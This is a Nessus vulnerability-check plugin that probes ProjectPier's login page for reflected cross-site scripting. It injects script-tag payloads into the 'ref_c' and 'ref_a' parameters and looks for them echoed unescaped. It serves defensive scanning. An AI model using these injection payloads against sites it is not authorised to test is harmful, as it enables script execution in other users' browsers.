#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31117);
  script_version("$Revision: 1.2 $");

  script_bugtraq_id(27857);

  script_name(english:"ProjectPier Login Page Cross-Site Scripting Vulnerabilities");
  script_summary(english:"Tries to inject script code into login form");

  desc = "
Synopsis :

The remote web server contains a PHP application that is affected by
cross-site scripting vulnerabilities. 

Description :

The remote host is running ProjectPier, an open-source project
management tool written in PHP. 

The version of ProjectPier installed on the remote host fails to
sanitize user input to the 'ref_c' and 'ref_a' parameters of the
'index.php' script before using it to generate dynamic HTML output. 
An unauthenticated attacker can exploit this to inject arbitrary HTML
and script code into a user's browser to be executed within the
security context of the affected site. 

Note that there are also reportedly several other vulnerabilities
associated with this version of ProjectPier, although Nessus has not
checked for them. 

See also :

http://www.securityfocus.com/archive/1/488294
http://www.projectpier.org/node/679

Solution :

Upgrade to ProjectPier 0.8.0.1 or later.

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


exploit1 = string('nessus"><script>alert(', rand(), ')</script>');
exploit2 = string(SCRIPT_NAME, '"><script>alert(', rand(), ')</script>');


# Loop through directories.
if (thorough_tests) dirs = make_list("/projectpier", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Inject some script code.
  req = http_get(
    item:string(
      dir, "/index.php?",
      "c=access&",
      "a=login&",
      "ref_c=", urlencode(str:exploit1), "&",
      "ref_a=", urlencode(str:exploit2)
    ),
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we see our exploits in the form.
  if (
    string('login[ref_c]" value="', exploit1, '"') >< res ||
    string('login[ref_a]" value="', exploit2, '"') >< res
  )
  {
    security_warning(port);
    exit(0);
  }
}
